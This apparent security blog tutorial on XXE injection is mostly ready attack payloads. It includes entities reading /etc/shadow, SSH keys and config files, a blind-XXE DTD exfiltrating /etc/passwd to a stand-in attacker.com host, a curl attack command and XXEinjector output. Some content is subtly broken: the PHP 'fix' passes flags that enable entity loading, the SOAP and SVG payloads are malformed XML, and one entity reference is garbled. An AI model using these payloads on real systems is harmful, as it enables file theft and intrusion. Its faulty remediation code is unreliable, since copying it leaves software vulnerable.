XML External Entity (XXE) Injection remains one of the most dangerous web vulnerabilities, allowing attackers to interfere with XML processing, read sensitive files, and execute Server-Side Request Forgery (SSRF) attacks. This guide covers exploitation techniques from basic file disclosure to advanced blind XXE scenarios.
Thank you for reading this post, don't forget to subscribe!
Understanding XXE Vulnerabilities
XXE attacks exploit XML parsers that process external entity references within XML documents. When an application accepts XML input without proper configuration, attackers can define custom entities that reference external resources:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
Types of XXE Attacks
1. In-Band XXE (Classic)
The server directly reflects the entity content in the response, allowing immediate file disclosure:
POST /api/process HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<input>&file;</input>
// Response contains /etc/passwd contents
2. Blind XXE
No direct response, but attackers can exfiltrate data via out-of-band channels:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<input>test</input>
// evil.dtd on attacker server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
3. XXE-Based SSRF
Exploit XML parsers to make server-side requests to internal systems:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<data>&xxe;</data>
// Access internal services behind firewall
Exploitation Techniques
File Disclosure Payloads
// Linux/Unix files
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///var/log/apache2/access.log">
// Windows files
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY xxe SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
// Application files
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
<!ENTITY xxe SYSTEM "file:///app/credentials.xml">
Parameter Entity Attacks
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % param1 "<!ENTITY param2 'Attack'>">
%param1;
]>
<root>¶m2;</root>
XXE in SOAP Services
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
</soap:Header>
<soap:Body>
<Login>
<Username>&xxe;</Username>
</Login>
</soap:Body>
</soap:Envelope>
Advanced XXE Scenarios
XXE in File Uploads
Many applications parse XML from uploaded files (DOCX, XLSX, SVG, PDF). Attackers embed XXE payloads in these formats:
// Malicious SVG file
<svg xmlns="http://www.w3.org/2000/svg">
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<text x="10" y="20">&xxe;</text>
</svg>
Error-Based XXE
Trigger parser errors that leak file contents in error messages:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///nonexistent">
]>
<root>&xxe;</root>
// Error: Failed to load external entity "file:///nonexistent"
Detection and Testing
Manual Testing
# Test with curl
curl -X POST https://target.com/api -H "Content-Type: application/xml" --data '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>'
# Using Burp Suite Intruder
# Load XXE payloads from SecLists
# Monitor responses for file contents
Automated Tools
- XXEinjector — Automated blind XXE exploitation
- Burp Suite — Scanner extension for XXE detection
- OWASP ZAP — Active scan rules for XXE
# XXEinjector usage
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd --file=request.txt
# Results:
[+] File /etc/passwd retrieved:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Remediation Strategies
PHP (libxml)
<?php
// Disable external entities
libxml_disable_entity_loader(true);
// Or use flag with DOMDocument
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
?>
Java (JAXP)
// Disable DTD processing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Python (lxml)
from lxml import etree
# Safe parser configuration
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False,
load_dtd=False
)
tree = etree.parse(xml_file, parser)
Real-World Impact
- Facebook (2018) — XXE in image processing allowed file disclosure
- LinkedIn (2012) — XXE via DOCX file uploads
- Google (2017) — XXE in Blogger XML import feature
Conclusion
XXE vulnerabilities continue to plague modern applications, especially those processing XML-based document formats. Implement parser hardening, disable external entity processing, and conduct regular security assessments to protect against these critical attacks.
Further Reading:
